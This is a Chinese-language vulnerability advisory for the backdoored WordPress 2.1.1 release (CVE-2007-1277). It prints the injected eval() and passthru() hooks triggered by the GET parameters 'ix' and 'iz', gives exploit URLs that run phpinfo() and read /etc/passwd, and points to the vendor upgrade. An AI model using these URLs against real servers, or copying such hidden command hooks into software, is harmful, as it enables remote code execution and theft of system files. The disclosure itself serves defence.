WordPress 2.1.1远程命令执行后门漏洞
添加时间:
2008-10-04
系统编号:
WAVDB-01100
BugCVE: CVE-2007-1277
BUGTRAQ: 22797
影响版本:
WordPress 2.1.1
程序介绍:
漏洞利用:
2008-10-04
系统编号:
WAVDB-01100
BugCVE: CVE-2007-1277
BUGTRAQ: 22797
影响版本:
WordPress 2.1.1
程序介绍:
WordPress是一款免费的论坛Blog系统。
漏洞分析:
WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。
被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码:
在wp-includes/feed.php文件中:
- function comment_text_phpfilter($filterdata) {
- eval($filterdata);
- }
- ...
- if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
eval()调用会执行通过ix变量传入的PHP代码。
在wp-includes/theme.php文件中:
- function get_theme_mcommand($mcds) {
- passthru($mcds);
- }
- ...
- if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
passthru()会执行通过iz变量传入的PHP代码。
漏洞利用:
http://wordpressurl/wp-includes/feed.php?ix=phpinfo()
http://wordpressurl/wp-includes/theme.php?iz=cat/etc/passwd
解决方案:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/download/
信息来源:
<*来源:Ivan Fratric (ifsecure@gmail.com)
链接:http://secunia.com/advisories/24374/
http://wordpress.org/development/2007/03/upgrade-212/
http://ifsec.blogspot.com/2007/0 ... ised-to-enable.html
*>